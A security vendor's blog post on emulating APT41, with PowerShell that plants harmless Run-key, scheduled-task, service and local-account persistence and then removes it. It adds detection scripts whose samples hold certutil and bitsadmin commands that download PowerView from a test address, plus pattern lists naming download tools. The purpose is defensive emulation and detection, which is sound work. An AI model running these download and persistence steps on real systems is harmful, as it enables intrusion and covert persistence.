Welcome to another week of #ThreatThursday. This week we leverage an adversary emulation plan created and shared with the community by a third party: APT41 Emulation Plan. As usual, we will cover Cyber Threat Intelligence, create a threat actor profile, create an adversary emulation plan from the work done by Huy, share the plan in our Github, explain some of the new TTPs we will leverage, and discuss how to defend against APT41. We hope you enjoy.
APT41 is a Chinese actor first seen active in 2012 and observed in broad-ranging campaigns through 2020. Its intent has been both state-sponsored espionage and financially motivated activity. After initial exploitation, APT41 leverages sophisticated TTPs and stages additional payloads with multiple different methods, such as bitsadmin and certutil. It also works to evade defenses and establish persistence, making it an incredibly dangerous threat actor.
Cyber Threat Intelligence Sources:
Many of these TTPs have been discussed in previous #ThreatThursdays, so we want to focus on some new ones. In the adversary emulation section we will discuss:
After reviewing the Cyber Threat Intelligence reports and MITRE ATT&CK mapping, we organized the TTPs by Tactic and created a threat profile for APT41:
As usual, we created and shared the APT41 adversary emulation plan on our Github in both ATT&CK Navigator JSON and SCYTHE Threat JSON. In this emulation plan, we broke down the threat into different steps: discovery, execution, defense evasion, persistence, credential access, and clean up. We also added threat automation language to check whether the payload is running with high integrity (administrative privilege). If it is running with privilege, it takes additional steps that are skipped when it is not.
APT41 leverages the well-known PowerShell script for host, network, and domain situational awareness (also known as reconnaissance or discovery) called PowerView.ps1. There are multiple ways to download and execute this script in memory, but in this case we are going to download the script to disk and then call it to run various cmdlets it provides:
APT41 uses two well-known living-off-the-land binaries and scripts. These are binaries signed by Microsoft that ship with the operating system and carry functionality that can be abused beyond their intended purpose. In the adversary emulation plan, we use bitsadmin and certutil to download two well-known PowerShell scripts, one for Kerberoasting and one for domain enumeration.
To maintain our non-destructive philosophy of emulation, we show the ability to download example payloads and execute PowerShell commands without running anything malicious. To show a proof of concept for persistence, we chose to add example registry keys, services, and tasks named so that they are easily distinguishable and removable.
Persistence through a Run key under HKCU and a scheduled task in the user's own context can be established by a user with limited privileges. We have added a check to the adversary emulation plan to determine the integrity of the process; if it is a high integrity process, it performs further persistence (such as service creation) and credential access TTPs that require administrative privileges:
After all the automation for APT41 is run, there are cleanup steps to remove the proof of concept persistence methods created by earlier actions.
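The persistence, integrity-check, and cleanup steps as one added proof of concept, written for this post rather than taken from the SCYTHE plan. The TTPoC prefix, the echo-only payload, and the placeholder account name TTPoCUser are assumptions; StorSyncSvc is the service name the reporting attributes to APT41 and is used here only as a never-started, empty service.

```powershell
# Added proof of concept, not the SCYTHE plan file. Artifacts named TTPoC* are mine.
# ASSUMED: StorSyncSvc comes from the APT41 reporting; the account name is a placeholder.
$Tag     = 'TTPoC'
$Payload = 'cmd.exe /c echo ThreatThursday'     # harmless payload
$RunKey  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$PocUser = "${Tag}User"

function Test-HighIntegrity {
    # The gate the emulation plan uses: is the current token elevated?
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Add-LowPrivPersistence {
    # T1547.001 Run key under HKCU: writable by the current user
    New-ItemProperty -Path $RunKey -Name $Tag -Value $Payload -PropertyType String -Force | Out-Null
    # T1053.005 scheduled task in the user's own context: no admin needed
    schtasks.exe /Create /F /TN $Tag /TR $Payload /SC DAILY /ST 09:00 | Out-Null
}

function Add-HighPrivPersistence {
    # T1543.003 service with the name from the APT41 reporting. It is never started,
    # so the bogus binPath does nothing (the SCM would fail it with error 1053 anyway).
    sc.exe create StorSyncSvc binPath= $Payload start= demand DisplayName= "$Tag service" | Out-Null
    # T1136.001 local account with a random throwaway password ('aA1!' guarantees complexity)
    $bytes = New-Object byte[] 18
    [Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    $pw = ConvertTo-SecureString ([Convert]::ToBase64String($bytes) + 'aA1!') -AsPlainText -Force
    New-LocalUser -Name $PocUser -Password $pw -Description "$Tag persistence test" | Out-Null
}

function Remove-PocPersistence {
    # Cleanup mirrors the creation steps and is safe to run even if some never happened
    Remove-ItemProperty -Path $RunKey -Name $Tag -ErrorAction SilentlyContinue
    schtasks.exe /Delete /F /TN $Tag 2>$null | Out-Null
    if (Test-HighIntegrity) {
        sc.exe delete StorSyncSvc 2>$null | Out-Null
        Remove-LocalUser -Name $PocUser -ErrorAction SilentlyContinue
    }
}

# --- emulation flow ---
Add-LowPrivPersistence
if (Test-HighIntegrity) {
    Add-HighPrivPersistence
} else {
    Write-Host 'Medium integrity: skipping service and account creation'
}

# Leave the artifacts in place long enough for log collection, then remove them
Start-Sleep -Seconds 60
Remove-PocPersistence
```

Run the script once as a standard user and once elevated to see the two branches; the cleanup function checks integrity again so it never tries to delete a service or account it could not have created.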
While APT41 covers a wide span of discovery, persistence, and evasion techniques, it also has a few specific key areas that can inform a security team on how to defend against it.
APT41 has a few methods of downloading additional payloads: PowerShell, certutil, and bitsadmin. These are living-off-the-land binaries: signed by Microsoft and shipped with the operating system, so blocking them outright breaks legitimate administration. The practical control is to log their command lines (Security event 4688 with command-line auditing enabled, or Sysmon process creation) and to alert when they are used to reach external resources.
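A detection for that download behavior, added here as an example and not taken from the post. It assumes Security event 4688 is collected with "Include command line in process creation events" turned on; the sample rows are constructed to look like 4688 fields, not real telemetry.

```powershell
# Added detection example, not from the post. ASSUMED: 4688 command-line auditing is on.
# Per-binary switches that mean "fetch something", paired with a URL on the command line
$LolbinDownloadPatterns = @{
    'certutil.exe'   = '(?i)-urlcache|-verifyctl'
    'bitsadmin.exe'  = '(?i)/transfer|/addfile|/create'
    'powershell.exe' = '(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|start-bitstransfer'
}
$UrlPattern = '(?i)\b(https?|ftp)://'

function Test-LolbinDownload {
    param([string]$Image, [string]$CommandLine)
    $exe = [IO.Path]::GetFileName($Image).ToLower()
    if (-not $LolbinDownloadPatterns.ContainsKey($exe)) { return $false }
    ($CommandLine -match $LolbinDownloadPatterns[$exe]) -and ($CommandLine -match $UrlPattern)
}

# Constructed samples shaped like 4688 NewProcessName / CommandLine (198.51.100.7 is a test address)
$samples = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe';  CommandLine = 'certutil -urlcache -split -f http://198.51.100.7/PowerView.ps1 C:\Users\Public\pv.ps1' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe';  CommandLine = 'certutil -hashfile C:\tools\x.exe SHA256' }   # legitimate use, no URL
    [pscustomobject]@{ Image = 'C:\Windows\System32\bitsadmin.exe'; CommandLine = 'bitsadmin /transfer j /download /priority normal http://198.51.100.7/k.ps1 C:\Users\Public\k.ps1' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\notepad.exe';   CommandLine = 'notepad http://intranet' }                    # URL but not a LOLBin
)
$samples | Where-Object { Test-LolbinDownload $_.Image $_.CommandLine } | Select-Object CommandLine

# Live hunt over the Security log; 4688 carries NewProcessName, CommandLine and SubjectUserName
function Get-LolbinDownloadEvents {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if (Test-LolbinDownload $d.NewProcessName $d.CommandLine) {
            [pscustomobject]@{ Time = $_.TimeCreated; User = $d.SubjectUserName; CommandLine = $d.CommandLine }
        }
    }
}
Get-LolbinDownloadEvents -Hours 24 | Format-Table -AutoSize
```

The rule pairs a transfer switch with a URL so that routine uses such as certutil -hashfile do not fire. For bitsadmin, the Microsoft-Windows-Bits-Client/Operational log (event 59) also records the job URL and catches transfers created without a visible command line.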
APT41 has been observed to use various publicly available PowerShell scripts by downloading them onto the endpoint and then executing them. In this adversary emulation plan we download the following to disk:
In this case we did not modify the scripts, so a detection keyed to the exact scripts known to be used by malicious actors (file hash or the scripts' distinctive function names) is an easy and effective way to catch this activity. There are many ways around it, but this detection is a start.
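Both forms of that detection as an added example written for this post (not from SCYTHE). It assumes PowerShell Script Block Logging is enabled (Microsoft-Windows-PowerShell/Operational, event 4104); the hash table is left with a placeholder comment to be filled with SHA-256 values of the exact script copies your CTI names, and the sample script text is constructed.

```powershell
# Added detection example, not from the post. ASSUMED: Script Block Logging (4104) is enabled.
$KnownScriptHashes = @{
    # '<sha256 of the exact PowerView.ps1 copy from your CTI>' = 'PowerView.ps1'
}
# Function names that survive renaming the file (but not real obfuscation)
$ScriptIndicators = 'Get-NetDomain', 'Get-DomainUser', 'Invoke-UserHunter', 'Invoke-Kerberoast'

function Test-KnownScriptContent {
    # Returns the indicator names found in a piece of script text
    param([string]$Text)
    foreach ($ind in $ScriptIndicators) {
        if ($Text -match "(?i)\b$ind\b") { $ind }
    }
}

function Find-KnownScriptOnDisk {
    # Exact-copy check by hash, plus the function-name check for renamed or lightly edited copies
    param([string]$Path)
    Get-ChildItem -Path $Path -Recurse -Include *.ps1 -ErrorAction SilentlyContinue | ForEach-Object {
        $hash = (Get-FileHash -Algorithm SHA256 -Path $_.FullName).Hash.ToLower()
        $ind  = @(Test-KnownScriptContent (Get-Content -Path $_.FullName -Raw))
        if ($KnownScriptHashes.ContainsKey($hash) -or $ind.Count -gt 0) {
            [pscustomobject]@{ File = $_.FullName; KnownHash = $KnownScriptHashes[$hash]; Indicators = ($ind -join ',') }
        }
    }
}

function Get-ScriptBlockHits {
    # 4104 logs the script block as it executes, so the text is visible even when the file is gone
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value        # ScriptBlockText
        $ind  = @(Test-KnownScriptContent $text)
        if ($ind.Count -gt 0) {
            [pscustomobject]@{ Time = $_.TimeCreated; Indicators = ($ind -join ','); Preview = $text.Substring(0, [Math]::Min(80, $text.Length)) }
        }
    }
}

# Constructed sample of what a 4104 block looks like once the downloaded script is dot-sourced and used
$sample = '. C:\Users\Public\pv.ps1; Get-NetDomain; Invoke-Kerberoast -OutputFormat Hashcat'
Test-KnownScriptContent $sample

Find-KnownScriptOnDisk -Path $env:USERPROFILE
Get-ScriptBlockHits -Hours 24 | Format-Table -AutoSize
```

The hash match only ever catches an unmodified copy; the function-name match survives a rename but not obfuscation. Script block logging is the more durable of the three because the block is logged after any string-level decoding, at execution time.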
An alarming method APT41 uses to establish persistence on a victim is creating a user account. Creating an account already requires administrative rights, so the defense is to keep the local Administrators group tightly scoped and to alert on every account creation (Security event ID 4720). Another method of persistence that is even more specific to APT41 is creating a service called “StorSyncSvc”. Detecting this service creation immediately (service installation also requires elevated privileges) would help defend against it.
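A detection for those two persistence actions, added as an example and not from the post. It assumes "Audit User Account Management" is enabled so the Security log records 4720, and that the System log keeps Service Control Manager event 7045; the user-writable-path heuristic and the sample calls are my additions.

```powershell
# Added detection example, not from the post. ASSUMED: 4720 auditing on, System log retains 7045.
$WatchedServiceNames = @('StorSyncSvc')          # service name from the APT41 reporting

function ConvertFrom-EventData {
    # Flatten <EventData><Data Name="..."> into a hashtable
    param($Event)
    $d = @{}
    foreach ($n in ([xml]$Event.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    $d
}

function Test-SuspiciousServiceInstall {
    # Returns a reason string for an alert, or $null when the install looks benign
    param([string]$ServiceName, [string]$ImagePath)
    if ($WatchedServiceNames -contains $ServiceName) { return 'known APT41 service name' }
    if ($ImagePath -match '(?i)\\(Users|ProgramData|Temp)\\') { return 'service binary in user-writable path' }   # my heuristic
    return $null
}

function Get-PersistenceAlerts {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)

    # 4720: A user account was created. SubjectUserName is the creator, TargetUserName the new account.
    # Account creation needs admin rights, so every hit deserves a look.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertFrom-EventData $_
            [pscustomobject]@{ Time = $_.TimeCreated; Alert = 'account created'; Detail = "$($d.SubjectUserName) created $($d.TargetUserName)" }
        }

    # 7045: A service was installed in the system (Service Control Manager), fields ServiceName / ImagePath
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertFrom-EventData $_
            $why = Test-SuspiciousServiceInstall $d.ServiceName $d.ImagePath
            if ($why) { [pscustomobject]@{ Time = $_.TimeCreated; Alert = $why; Detail = "$($d.ServiceName) -> $($d.ImagePath)" } }
        }
}

# Constructed cases for the service rule
Test-SuspiciousServiceInstall 'StorSyncSvc' 'C:\Windows\System32\svchost.exe -k netsvcs'   # name from the reporting
Test-SuspiciousServiceInstall 'Updater'     'C:\Users\Public\u.exe'                      # user-writable path
Test-SuspiciousServiceInstall 'VendorSvc'   'C:\Program Files\Vendor\svc.exe'            # benign install

Get-PersistenceAlerts -Hours 24 | Format-Table -AutoSize
```

If the Security audit policy "Audit Security System Extension" is enabled, event 4697 records the same service installation in the Security log and can be used in place of 7045.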
While APT41 is a sophisticated actor, we can still ingest the Cyber Threat Intelligence, map it to MITRE ATT&CK, and create an adversary emulation plan that covers much of the behavior of the threat. More importantly, this emulation can aid in developing methods of preventing and detecting this threat through its specific and unique behaviors. We hope you enjoyed this edition of #ThreatThursday.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io.